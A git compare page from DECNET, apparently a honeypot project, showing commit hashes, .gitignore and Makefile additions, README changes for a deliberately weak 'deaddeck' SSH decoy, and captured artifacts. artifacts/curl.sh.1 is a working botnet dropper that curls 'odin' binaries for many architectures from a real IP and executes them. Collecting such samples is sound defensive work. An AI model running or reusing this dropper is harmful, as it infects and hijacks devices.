Compare commits
492 Commits
testing
...
4586e36d63
| Author | SHA1 | Date | |
|---|---|---|---|
| 4586e36d63 | |||
| 8b3f74b39b | |||
| 0fe9f895d0 | |||
| ac332a6ba9 | |||
| e26876ee92 | |||
| 6a91858c15 | |||
| 54dede5077 | |||
| b41a7e3115 | |||
| ab18cd7797 | |||
| 0403cfc6a2 | |||
| 349f88252a | |||
| 59d3351306 | |||
| 80fff1efa4 | |||
| a009746dd1 | |||
| 52f2f65fa3 | |||
| ff51ce55e2 | |||
| a2c34cac02 | |||
| 9a7b03700c | |||
| de3634d739 | |||
| c39b63a431 | |||
| 6e7020f2aa | |||
| 471b33df1b | |||
| 39518e33b4 | |||
| a8f6a28f3a | |||
| 8f6f56f481 | |||
| 6fecf45dcd | |||
| 4c8ef2f104 | |||
| 64610bf96e | |||
| e4626879f6 | |||
| f63aca4186 | |||
| 95593cb804 | |||
| 16e032b7a5 | |||
| 967aec56d2 | |||
| d3899dde96 | |||
| c2693aafc3 | |||
| 92f43b4655 | |||
| f11def0af1 | |||
| 6a6f5807aa | |||
| 5675dd8ebc | |||
| 8d1f26c0c7 | |||
| 44ab42d80c | |||
| d09b891a55 | |||
| 42b5d97a50 | |||
| 1669f25733 | |||
| 255ccebf29 | |||
| d4f391bab1 | |||
| 38cf1e6c6d | |||
| 6618b3c2a1 | |||
| 7b54944fcc | |||
| 46963cbeec | |||
| f2b0d286b3 | |||
| f1ac1b4004 | |||
| 3154224f68 | |||
| 724380901f | |||
| 52a52eee78 | |||
| 251181255b | |||
| 92632d7afd | |||
| 0653e500b5 | |||
| ec5b49144e | |||
| 8dde954559 | |||
| d1478f900c | |||
| 39eb1ce5db | |||
| c66749209f | |||
| 41b8e9b7b3 | |||
| 155ab59ee8 | |||
| f10201e885 | |||
| 4c6b12dcf8 | |||
| 51d0fc7b6c | |||
| ef13e1fe4e | |||
| 97c99a4e03 | |||
| 1200ac9132 | |||
| 8990d9321d | |||
| d6a091be75 | |||
| e548be3c49 | |||
| c210a56fc8 | |||
| f827197cc8 | |||
| 1ee7a4a481 | |||
| 915bc6d7ef | |||
| fe0ed4a251 | |||
| c4d6eb5bb3 | |||
| 1d3086a5c7 | |||
| 84a075e405 | |||
| 9675f4bf92 | |||
| 4fbce6a8b0 | |||
| e50474cb66 | |||
| 0a9a2f9021 | |||
| 4bd502d3bf | |||
| e92d415304 | |||
| 1f3f58c42c | |||
| d25f69ba1b | |||
| a3f1cea2d6 | |||
| b326d70852 | |||
| bf79581cc9 | |||
| e29a0094c9 | |||
| 275fac5288 | |||
| 2c1ccec8fa | |||
| 780d395a46 | |||
| 9def7fd22f | |||
| 3a8519b2a1 | |||
| 31f4c54c32 | |||
| 7408a04a90 | |||
| 1ac64d2ae2 | |||
| 432057f44a | |||
| d743d38cac | |||
| 44f4dd8c85 | |||
| ac64329a13 | |||
| c1a65bf9a3 | |||
| 97e72d975b | |||
| a19d8bba17 | |||
| 6e0e1c204e | |||
| f33a011900 | |||
| 5f2a3f4629 | |||
| 212feb49e2 | |||
| 171e20e427 | |||
| 4a9cd90f90 | |||
| ccae1612bd | |||
| be35228191 | |||
| 8807da218b | |||
| f2fd314dd6 | |||
| b1fbf4630e | |||
| 209efd1a74 | |||
| 6ba12cc571 | |||
| c5cbe084cb | |||
| 0c8c74a89d | |||
| 69f547f75e | |||
| b664655dcb | |||
| e30455551d | |||
| a35048b174 | |||
| 08c274486e | |||
| 9da6f6983e | |||
| 9ddeb1a08c | |||
| 1e2bc41ab1 | |||
| 849caffaf1 | |||
| b6ff288dcf | |||
| 032ffbb4eb | |||
| 8c168c64a8 | |||
| 6d7c0b6419 | |||
| d5efebd73d | |||
| 14713eb294 | |||
| 9cee4b2e71 | |||
| 7b21f31078 | |||
| 95e1a4ab7a | |||
| f524d283b7 | |||
| 653ae04e88 | |||
| 22cfb10617 | |||
| 07a7d4918c | |||
| 3318b15044 | |||
| 5a34b1846c | |||
| ccff1467b1 | |||
| 6d1fc3a081 | |||
| a81ea3f973 | |||
| 438a6e3e45 | |||
| 9cab37db3a | |||
| 388a968d89 | |||
| aa0b22aacb | |||
| 11b2da7d54 | |||
| 34c778277a | |||
| df0c8e12e7 | |||
| 47c57271e7 | |||
| f3f7bff717 | |||
| 846a50dbbf | |||
| 65ddaaa681 | |||
| 0c1fc68b13 | |||
| 5253b32319 | |||
| 5de4b5e290 | |||
| 9cc3272a0d | |||
| 33f7d5a9ff | |||
| e2c7e16793 | |||
| dd265d7520 | |||
| c39802a4bb | |||
| 4956977739 | |||
| c2891d6cca | |||
| e94ab608d9 | |||
| 69c8cfd2b9 | |||
| b3ff80d74e | |||
| 7634e31e5a | |||
| 2ff2537f6c | |||
| bb77d13f9a | |||
| 5116023bf7 | |||
| 5ff89eefe7 | |||
| 834aa613b1 | |||
| bf3f9c746a | |||
| 588ea4e411 | |||
| aba1e37389 | |||
| 9ebaca410a | |||
| ac04751c18 | |||
| f10931f24d | |||
| 79f253c969 | |||
| 40a283a7ec | |||
| d4dc7dff81 | |||
| 3ba7e22b71 | |||
| acf8382bcf | |||
| 17b53dad4d | |||
| 337c7392b9 | |||
| 09f598ce47 | |||
| c11f3605be | |||
| 289a64014c | |||
| a25f4a890d | |||
| 51ecd0924e | |||
| c8166a6071 | |||
| cd7c7ea5a2 | |||
| b7ff5d2cc1 | |||
| 4257f7b6e2 | |||
| 07ff5ff0c9 | |||
| 1ff02f0c77 | |||
| b7534c311a | |||
| 96a4039366 | |||
| 1341df2705 | |||
| d40495d71b | |||
| 627fa59c15 | |||
| 46775fc0e5 | |||
| 0fba6b6113 | |||
| 8183218d29 | |||
| b704352783 | |||
| f286c84d95 | |||
| 6c2e4ada83 | |||
| 2254651270 | |||
| f948e10830 | |||
| 601986bd6d | |||
| bc62e42ce1 | |||
| 4fc980e968 | |||
| a077cf67c8 | |||
| 771944830a | |||
| 8161c67ec5 | |||
| d04f91cd8c | |||
| 0737fcfe93 | |||
| d90c8b70ce | |||
| 0510cde073 | |||
| 640294f3dc | |||
| 842b7de950 | |||
| 2f8c107e70 | |||
| 3fc6ea5f75 | |||
| e52a0e0381 | |||
| f3880b24d1 | |||
| 6763fceb0b | |||
| 879f5e731b | |||
| c9a81a23c2 | |||
| f8eae04e5d | |||
| a2a61b636e | |||
| 0972325527 | |||
| 11f474556c | |||
| 3f080f601d | |||
| 03beff3840 | |||
| 866a76eccf | |||
| 6c6f97e840 | |||
| dcd558fd91 | |||
| 6e19d3a25a | |||
| b3a96a045f | |||
| b88d67794d | |||
| e0b07651fd | |||
| 79674026dd | |||
| e972d870de | |||
| 7036a86e76 | |||
| cdbb3d3571 | |||
| 3e9c4c29b9 | |||
| c675bd26cf | |||
| b27332169d | |||
| 39a298f685 | |||
| b3ea3fa925 | |||
| 17367d0a69 | |||
| c714941069 | |||
| 291b78c1d0 | |||
| fb85762703 | |||
| e9324acac7 | |||
| 2ce150a53e | |||
| 9a7d116351 | |||
| f8dee596e5 | |||
| 75ff0ede1f | |||
| a31ad82880 | |||
| 999d3494b4 | |||
| d1c4a48963 | |||
| 84699f89da | |||
| 42e9492118 | |||
| c4e29e3bf9 | |||
| f9901befc4 | |||
| b5ce236cab | |||
| b043c96d29 | |||
| d9d2a80573 | |||
| e08bfc4a73 | |||
| 7ab0df3680 | |||
| ca1e04033c | |||
| 7d1f048764 | |||
| 301d3feee9 | |||
| e84b522fd3 | |||
| 65435f1427 | |||
| 44ade3eb63 | |||
| 9a31d0e50c | |||
| 07a609973b | |||
| 403d83faba | |||
| 101127247e | |||
| 322fd44d72 | |||
| 62ad76615e | |||
| 7a89fbb357 | |||
| f211d394e6 | |||
| 7865e71aa9 | |||
| eff3e4bce7 | |||
| 321ea7a2a6 | |||
| e7531ee756 | |||
| b819dfefa3 | |||
| dc1867315d | |||
| 1ad15470a1 | |||
| 806301e179 | |||
| b1fe1f9403 | |||
| c635478442 | |||
| ed3f340ea8 | |||
| 8a93ee3129 | |||
| f41995a229 | |||
| 89ce893792 | |||
| fee697694d | |||
| 226b3adfa2 | |||
| 3664ea7008 | |||
| 0217319423 | |||
| bf5414c0d1 | |||
| f4fe6fe6e4 | |||
| 4a93e16407 | |||
| 6814949bc0 | |||
| c276b5696e | |||
| fd81be0bb1 | |||
| 79e6df8343 | |||
| bcd1f14cd3 | |||
| b6e31e64e9 | |||
| b7f206c8c5 | |||
| cfbfaabfcd | |||
| b5a19301a2 | |||
| 0cdf8d90da | |||
| e2078c868d | |||
| 1ffaa3df41 | |||
| 5accf8f1b1 | |||
| cce84f23dc | |||
| e58aa4fe3a | |||
| e6f1da2344 | |||
| c3a799726f | |||
| 19cc8aa859 | |||
| 208ffd8f4f | |||
| cb9d183c20 | |||
| a703f9eda7 | |||
| c3c5813211 | |||
| e395306dcb | |||
| ce7efdfdd2 | |||
| d09764beec | |||
| 9e003d3acd | |||
| 776861a1b7 | |||
| bd50b0d8b2 | |||
| f6e67c036d | |||
| d187304e99 | |||
| 0f90dcfd3e | |||
| 65a2bdf0e7 | |||
| ed6263a53d | |||
| ee24a7551f | |||
| 7e4da95091 | |||
| b9684254f0 | |||
| e387acf79d | |||
| d637ff515e | |||
| 502ac42518 | |||
| f597ab2810 | |||
| 19271f9319 | |||
| 52b5074149 | |||
| 614780f144 | |||
| d777a1c4e0 | |||
| 9cf7bc5aab | |||
| 5a240a3d55 | |||
| 05cdd72d51 | |||
| 6f8f2ed573 | |||
| 23caa86266 | |||
| 909913e912 | |||
| fc1f0914b7 | |||
| 3456d3ab45 | |||
| 3cb0203d07 | |||
| eb34d0b1ea | |||
| 78d3e3a6b9 | |||
| 0b5228eb94 | |||
| 57fecb8071 | |||
| b754e9aa8b | |||
| 402d6584ba | |||
| 9ad62d8177 | |||
| eb7ccd0006 | |||
| 17480093a9 | |||
| d1ed2701e7 | |||
| 07e6bafff8 | |||
| 84e0ac4a43 | |||
| 257857338c | |||
| 3fce597a70 | |||
| 2629a8a0de | |||
| a8c69155ff | |||
| 8a40f6ced0 | |||
| 1e1c92abc3 | |||
| ebe15310ab | |||
| c7fcd86be4 | |||
| f597d70430 | |||
| f6422f2529 | |||
| 542d129d6f | |||
| a5487eb55f | |||
| e124f9e296 | |||
| c648d8b04e | |||
| 72498f81b2 | |||
| d0b07bdf52 | |||
| 4d12fb6a03 | |||
| 633594b110 | |||
| 761c23a07c | |||
| f0d47c5195 | |||
| 8ae7b9636e | |||
| 4c0a1309f0 | |||
| c78ba6f698 | |||
| fdf38a9d8c | |||
| 24cdef9246 | |||
| 9a4fe2677b | |||
| 4b7cb42ab1 | |||
| bbb1762250 | |||
| 2ddba04f79 | |||
| f0756dcdec | |||
| 18393f1e1c | |||
| 9ed0094045 | |||
| fca0953439 | |||
| b364c41736 | |||
| fbc9877ef2 | |||
| 9adee07d21 | |||
| a322d88b3c | |||
| 917f7e8e54 | |||
| f84c66cf9b | |||
| 07b32e2abe | |||
| 5f4005c47a | |||
| 2fc5f1bdc5 | |||
| b26dd8f529 | |||
| f86dc79990 | |||
| 907ade9142 | |||
| de6d5cd1a8 | |||
| dd807bc55e | |||
| f64e78f78c | |||
| 12cd7ad9cb | |||
| eefab020d4 | |||
| 94b06ee862 | |||
| 77ceb9d6f3 | |||
| d8fa7cc73d | |||
| 97260daf8d | |||
| 8d3f5c646a | |||
| 5912608f78 | |||
| ba0e7ca476 | |||
| e51666ee14 | |||
| bd7f2dfaed | |||
| 75b1ce3a31 | |||
| 54b1fbed14 | |||
| d314470d7f | |||
| 57e527534c | |||
| 892219ec87 | |||
| c002c5a4f1 | |||
| a27e3f5e0f | |||
| 98c929894c | |||
| e3afec4e70 | |||
| f347a3a736 | |||
| eed55619cb | |||
| 8c06190e69 | |||
| 578cdf9e2e | |||
| 2731b2608b | |||
| 472c84b9c8 | |||
| bbed52a962 | |||
| d595240f55 | |||
| 9e8d0b0464 | |||
| 463877b8fc | |||
| 0e5484648f | |||
| e7d49d7237 | |||
| 1a631c9400 | |||
| 2fabcd1c29 | |||
| 06f208c86e | |||
| 4287e94deb | |||
| c942d4d333 | |||
| 6ac8cac908 | |||
| 0bc4b05c73 | |||
| 3fe999d706 | |||
| 5802de1f86 | |||
| 04b0637c24 | |||
| e3ddeb0395 | |||
| 88f276e9e7 | |||
| 6055f9c837 | |||
| d4591b38dc | |||
| 862e4dbb31 | |||
|
|
499836c9e4 | ||
| bb9c782c41 | |||
| 597854cc06 | |||
| 3b4b0a1016 | |||
|
|
8ad3350d51 | ||
| 23ec470988 | |||
| 4064e19af1 | |||
|
|
ac4e5e1570 | ||
| eb40be2161 | |||
| 0927d9e1e8 | |||
| 9c81fb4739 | |||
| e4171789a8 | |||
| f64c251a9e | |||
| c56c9fe667 | |||
| 897f498bcd | |||
| 92e06cb193 | |||
| 7ad7e1e53b |
19
.gitignore
vendored
19
.gitignore
vendored
@@ -51,3 +51,22 @@ schem
|
|||||||
|
|
||||||
# pydeps-style dependency graph dumps from local analysis runs.
|
# pydeps-style dependency graph dumps from local analysis runs.
|
||||||
deps.txt
|
deps.txt
|
||||||
|
|
||||||
|
# Node modules vendored under decnet/canary/ for the obfuscator helper.
|
||||||
|
# The package.json is the source of truth; modules are reinstalled at
|
||||||
|
# build/deploy time.
|
||||||
|
node_modules/
|
||||||
|
package-lock.json
|
||||||
|
|
||||||
|
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||||
|
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||||
|
# files alongside ARE committed and exercise the harness in CI.
|
||||||
|
tests/ttp/rule_precision/corpus/*.jsonl
|
||||||
|
# Re-include the synthetic seed files that the corpus/*.jsonl glob would otherwise ignore.
!tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||||
|
threatfox-api.json
|
||||||
|
|
||||||
|
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
|
||||||
|
enterprise-attack-*.json
|
||||||
|
|
||||||
|
# pytest failure dump files
|
||||||
|
testfail
|
||||||
|
|||||||
219
Makefile
Normal file
219
Makefile
Normal file
@@ -0,0 +1,219 @@
|
|||||||
|
PYTEST := .311/bin/pytest
|
||||||
|
FAIL_FAST ?= 1
|
||||||
|
ARGS :=
|
||||||
|
|
||||||
|
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
|
||||||
|
# Unit suites inherit that; special suites clear it with --override-ini.
|
||||||
|
UNIT_FLAGS := --timeout=30 --timeout-method=thread
|
||||||
|
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
|
||||||
|
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
|
||||||
|
--ignore=tests/api/test_schemathesis.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_agent.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_swarm.py \
|
||||||
|
--ignore=tests/api/test_schemathesis_ttp.py
|
||||||
|
SCHEMA_QUICK ?= 0
|
||||||
|
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
|
||||||
|
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
|
||||||
|
|
||||||
|
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-core
|
||||||
|
test-core:
|
||||||
|
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-web
|
||||||
|
test-web:
|
||||||
|
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-db
|
||||||
|
test-db:
|
||||||
|
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-bus
|
||||||
|
test-bus:
|
||||||
|
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-ttp
|
||||||
|
test-ttp:
|
||||||
|
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-intel
|
||||||
|
test-intel:
|
||||||
|
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-analysis
|
||||||
|
test-analysis:
|
||||||
|
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-infra
|
||||||
|
test-infra:
|
||||||
|
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-fleet
|
||||||
|
test-fleet:
|
||||||
|
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-cli
|
||||||
|
test-cli:
|
||||||
|
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-features
|
||||||
|
test-features:
|
||||||
|
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
# ── Go and React suites ───────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
_GO_MODULES := \
|
||||||
|
decnet/templates/_caddy_modules/decnetfp \
|
||||||
|
decnet/templates/http/_caddy_modules/decnetfp \
|
||||||
|
decnet/templates/https/_caddy_modules/decnetfp
|
||||||
|
|
||||||
|
.PHONY: test-go
|
||||||
|
test-go:
|
||||||
|
@failed=""; \
|
||||||
|
for mod in $(_GO_MODULES); do \
|
||||||
|
echo "=== go test: $$mod ==="; \
|
||||||
|
if (cd "$$mod" && go test ./...); then \
|
||||||
|
echo "[PASS] $$mod"; \
|
||||||
|
else \
|
||||||
|
echo "[FAIL] $$mod"; \
|
||||||
|
failed="$$failed $$mod"; \
|
||||||
|
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
|
||||||
|
fi; \
|
||||||
|
done; \
|
||||||
|
[ -z "$$failed" ]
|
||||||
|
|
||||||
|
.PHONY: test-react
|
||||||
|
test-react:
|
||||||
|
cd decnet_web && npm run test:run $(ARGS)
|
||||||
|
|
||||||
|
# ── Special suites (sequential, longer timeout) ───────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-live
|
||||||
|
test-live:
|
||||||
|
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-api
|
||||||
|
test-api:
|
||||||
|
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-stress
|
||||||
|
test-stress:
|
||||||
|
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-service
|
||||||
|
test-service:
|
||||||
|
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-fuzz
|
||||||
|
test-fuzz:
|
||||||
|
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-schema
|
||||||
|
test-schema:
|
||||||
|
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
|
||||||
|
tests/api/test_schemathesis.py \
|
||||||
|
tests/api/test_schemathesis_agent.py \
|
||||||
|
tests/api/test_schemathesis_swarm.py \
|
||||||
|
tests/api/test_schemathesis_ttp.py \
|
||||||
|
$(SCHEMA_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-bench
|
||||||
|
test-bench:
|
||||||
|
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
.PHONY: test-docker
|
||||||
|
test-docker:
|
||||||
|
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
|
||||||
|
|
||||||
|
# ── Static analysis ───────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
.PHONY: test-mypy
|
||||||
|
test-mypy:
|
||||||
|
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
|
||||||
|
|
||||||
|
.PHONY: test-bandit
|
||||||
|
test-bandit:
|
||||||
|
.311/bin/bandit -r decnet -c pyproject.toml
|
||||||
|
|
||||||
|
.PHONY: test-vulture
|
||||||
|
test-vulture:
|
||||||
|
.311/bin/vulture decnet --min-confidence 80
|
||||||
|
|
||||||
|
.PHONY: test-pip-audit
|
||||||
|
test-pip-audit:
|
||||||
|
.311/bin/pip-audit
|
||||||
|
|
||||||
|
# ── Composite: all suites ─────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
|
||||||
|
go react \
|
||||||
|
live api schema stress service fuzz bench docker \
|
||||||
|
mypy bandit vulture pip-audit
|
||||||
|
|
||||||
|
.PHONY: test-all test
|
||||||
|
test-all test:
|
||||||
|
@failed=""; \
|
||||||
|
for suite in $(_ALL_SUITES); do \
|
||||||
|
echo ""; \
|
||||||
|
echo "══════════════════════════ $$suite ══════════════════════════"; \
|
||||||
|
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
|
||||||
|
echo "[PASS] $$suite"; \
|
||||||
|
else \
|
||||||
|
echo "[FAIL] $$suite"; \
|
||||||
|
failed="$$failed $$suite"; \
|
||||||
|
if [ "$(FAIL_FAST)" = "1" ]; then \
|
||||||
|
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
|
||||||
|
exit 1; \
|
||||||
|
fi; \
|
||||||
|
fi; \
|
||||||
|
done; \
|
||||||
|
if [ -n "$$failed" ]; then \
|
||||||
|
echo ""; \
|
||||||
|
echo "Failed:$$failed"; \
|
||||||
|
exit 1; \
|
||||||
|
fi; \
|
||||||
|
echo ""; \
|
||||||
|
echo "All suites passed."
|
||||||
|
|
||||||
|
.PHONY: help
|
||||||
|
help:
|
||||||
|
@echo "Unit suites (xdist, 30s timeout):"
|
||||||
|
@echo " make test-core tests/core + config + factories + fixtures"
|
||||||
|
@echo " make test-web tests/web + services"
|
||||||
|
@echo " make test-db tests/db + vectorstore"
|
||||||
|
@echo " make test-bus tests/bus + logging + telemetry"
|
||||||
|
@echo " make test-ttp tests/ttp"
|
||||||
|
@echo " make test-intel tests/intel + asn + geoip"
|
||||||
|
@echo " make test-analysis tests/clustering + correlation"
|
||||||
|
@echo " make test-infra tests/agent + collector + sniffer + profiler"
|
||||||
|
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
|
||||||
|
@echo " make test-cli tests/cli + engine + mutator + realism"
|
||||||
|
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
|
||||||
|
@echo ""
|
||||||
|
@echo "Go / React suites:"
|
||||||
|
@echo " make test-go go test ./... in each Caddy module variant"
|
||||||
|
@echo " make test-react vitest run in decnet_web"
|
||||||
|
@echo ""
|
||||||
|
@echo "Special suites (sequential, 120s timeout):"
|
||||||
|
@echo " make test-live tests/live"
|
||||||
|
@echo " make test-api tests/api (schemathesis)"
|
||||||
|
@echo " make test-stress tests/stress"
|
||||||
|
@echo " make test-service tests/service_testing"
|
||||||
|
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist -n 4, 600s timeout)"
|
||||||
|
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
|
||||||
|
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
|
||||||
|
@echo " make test-bench tests/perf"
|
||||||
|
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
|
||||||
|
@echo ""
|
||||||
|
@echo "Static analysis:"
|
||||||
|
@echo " make test-mypy mypy type check on decnet/"
|
||||||
|
@echo " make test-bandit bandit security scan on decnet/"
|
||||||
|
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
|
||||||
|
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
|
||||||
|
@echo ""
|
||||||
|
@echo "Composites:"
|
||||||
|
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
|
||||||
|
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
|
||||||
|
@echo ""
|
||||||
|
@echo "Passthrough: make test-web ARGS='--lf -s'"
|
||||||
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
|
|||||||
|
|
||||||
| Slug | Services | OS Fingerprint | Description |
|
| Slug | Services | OS Fingerprint | Description |
|
||||||
|---|---|---|---|
|
|---|---|---|---|
|
||||||
|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
|
||||||
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
||||||
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
||||||
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
||||||
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
|
|||||||
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
||||||
|
|
||||||
```ini
|
```ini
|
||||||
|
[deaddeck-1]
|
||||||
|
amount=1
|
||||||
|
archetype=deaddeck
|
||||||
|
ssh.password=admin
|
||||||
|
|
||||||
[decky-webmail.http]
|
[decky-webmail.http]
|
||||||
server_header = Apache/2.4.54 (Debian)
|
server_header = Apache/2.4.54 (Debian)
|
||||||
fake_app = wordpress
|
fake_app = wordpress
|
||||||
|
|||||||
3
artifacts/curl.sh
Normal file
3
artifacts/curl.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/curl.sh' ...
|
||||||
|
Saving 'curl.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/curl.sh]
|
||||||
46
artifacts/curl.sh.1
Normal file
46
artifacts/curl.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
|
||||||
|
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
|
||||||
|
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
|
||||||
|
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
|
||||||
|
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
|
||||||
|
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
|
||||||
|
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
|
||||||
|
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
|
||||||
|
